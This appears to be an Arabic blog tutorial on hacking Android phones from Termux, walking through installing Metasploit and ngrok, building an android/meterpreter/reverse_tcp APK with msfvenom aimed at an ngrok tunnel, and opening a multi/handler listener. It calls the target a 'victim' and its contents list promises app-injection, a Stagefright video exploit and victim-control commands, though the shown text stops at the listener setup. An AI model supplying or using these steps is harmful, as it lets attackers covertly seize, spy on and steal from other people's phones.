كل ما يخص Termux
شرح كامل للاختراق و الحقن metasploit
تعريف مصطلحات والادوات اللي بنستخدمها
شرح مبسط اولي
رابط تحميل تيرمكس
اساسيات تيرمكس
تحميل الميتاسبلويت
تحميل نجروك
الدخول الى الرابط التالي وهو موقع نجروك الاساسي :
مابعد التحميل :
شرح فتح بورت نجروك
حل عدم فتح بورت
صنع بايلود تطبيق من الميتاسبلويت
فتح جلسة تنصت بايلود تطبيق
تحميل حاقن تطبيقات
حقن بايلود في تطبيق
تفاصيل عن الحاقن
فتح جلسة التنصت تطبيق بايلود تطبيق
اوامر التحكم بجهاز الضحيه
تعريف مصطلحات والادوات اللي بنستخدمها
المصطلح الاول
بورت|Port
منفذ او شباك للوصل بين شيئين
المصطلح الثاني
بايلود|pyload
حمولة يتم ارسالها للضحيه لكي يفتح منفذ او باب سري في الجهاز تتيح للمخترق التسلل للجهاز
المصطلح الثالث
جلسة تنصت
مكان ارسال واستقبال الاوامر والملفات من جهازك الى جهاز الضحيه والعكس
السكربت الاول
ميتاسبلوست|ميتا|metasploit
هو عبارة عن مكتبة من الأدوات ، وقواعد بيانات لمجموعة من الثغرات التي يتم اكتشافها
السكربت الثاني
نجروك|ngrok
اداة تقوم بفتح بورت (منفذ للاتصال و الارسال بين الضحية و المهاجم )
السكربت الثالث
تيمكس|temux bunch
اداة لحقن البايلودات في التطبيقات
السكربت الرابع
Exploit Android Stagefright
حقن فيديو واختراق الجهاز بفيديو
شرح مبسط اولي
لكي نخترق جهاز اولا يجب ان نصنع بايلود لكي نرسله الى الضحيه ثم نفتح جلسة تنصت ونربط البايلود و جلسة التنصت باستخدام بورت
رابط تحميل تيرمكس
رابط التحميل من جوجل بلاي :
اساسيات تيرمكس
[+] افتح تيرمكس
[+] اكتب الاوامر التالية :
termux-setup-storage
pkg update -y && pkg upgrade -y && pkg install git -y && pkg install python -y && pkg install python2 -y && pkg install curl -y && pkg install wget -y && pkg install ruby -y && pkg install perl -y && pkg install proot -y
تحميل الميتاسبلويت
افتح تيرمكس
اكتب الاوامر التالية :
curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
chmod +x metasploit.sh
bash metasploit.sh
cd metaaploit-framework
bundle install rake-12.3.1
bundle config build.nokogiri--use-system--libraries
gem install nokogiri
gem install pkg-config -v rake-12.3.1
bundle install rake-12.3.1
تحميل نجروك
الدخول الى الرابط التالي وهو موقع نجروك الاساسي :
https://ngrok.com
الضغط على كلمة sign up التي بالاحمر لتسجيل حساب جديد
إملاء الخانات التاليه المعروضة في الموقع :
your name|اسمك
your email|إيميلك
confirm email|اعد كتابة ايميلك
password|كلمة السر
وخذ اختبار الكابتشا
اضغط على sign up
إنتهى شرح تسجيل الدخول
انزل الى الاسفل وسنجد 4 مربعات
المربع الاول : download ngrok
المربع الثاني : unzip to install
المربع الثالث : confirm your account
المربع الرابع : fire it up
سنحتاج الاول والثالث فقط
نضغط المريع الاول وسيبدء التحميل
مابعد التحميل :
ادخل الى تيرمكس
cd /sdcard/download
امر الدخول الى الذاكرة الداخليه/ملف التحميلات
cp ngrok-stable-linux-arm.zip $HOME
امر نسخ ملف النجروك الى الهوم
cd $HOME
امر الدخول للهوم
unzip ngrok-stable-linux-arm.zip
فك الضغط عن ملف نجروك
rm ngrok-stable-linux-arm.zip
امر حذف الملف المضغوط
الدخول الى الموقع والتوجه الى المربع الثالث ستجدون رمز طويل بالخط الابيض وخلفيه سوداء انسخوه
اذهبو الى تيرمكس
الصقو الرمز
شرح فتح بورت نجروك
الدخول الى تيرمكس
cd $HOME
./ngrok tcp [port]
يفضل فتح البورت 4444 او 8080
مثال :
./ngrok tcp 4444
طريقة التاكد من ان البورت مفتوح
ظهور كلمة online بالاخضر
حل عدم فتح بورت
الذهاب الى تيرمكس
اكتب
apt update
apt upgrade
pkg install proot
termux-chroot
اذا لم ينجح :
فعل الفي بي ان
اذا لم ينجح :
اذا لم ينجح :
شغل 3g او 4g
غير تحديث التيرمكس
اذا لم ينجح :
المشكلة ليست مع الطريقة ستكون المشكلة من مزود الخدمه بعض الشركات لا تسمح بفتح بورتات في الشبكة
صنع بايلود تطبيق من الميتاسبلويت
ادخل الى التيرمكس
فتح بورت ونسخ البورت المفتوح
cd $HOME/metasploit-framework
msfvenom -p android/meterpreter/reverse_tcp LHOST=tcp://0.tcp.ngrok.io LPORT=$port -o /sdcard/$name.apk
مكان $port ضعو البورت المقتوح
مكان $name ضعو اسم التطبيق
سيتم صنع البورت ونقله الى الصفحه الرئيسية من الذاكرة الداخليه
فتح جلسة تنصت بايلود تطبيق
[+] الذهاب الى تيرمكس
cd /$HOME/metasploit-framework
./msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
إرسال تعليق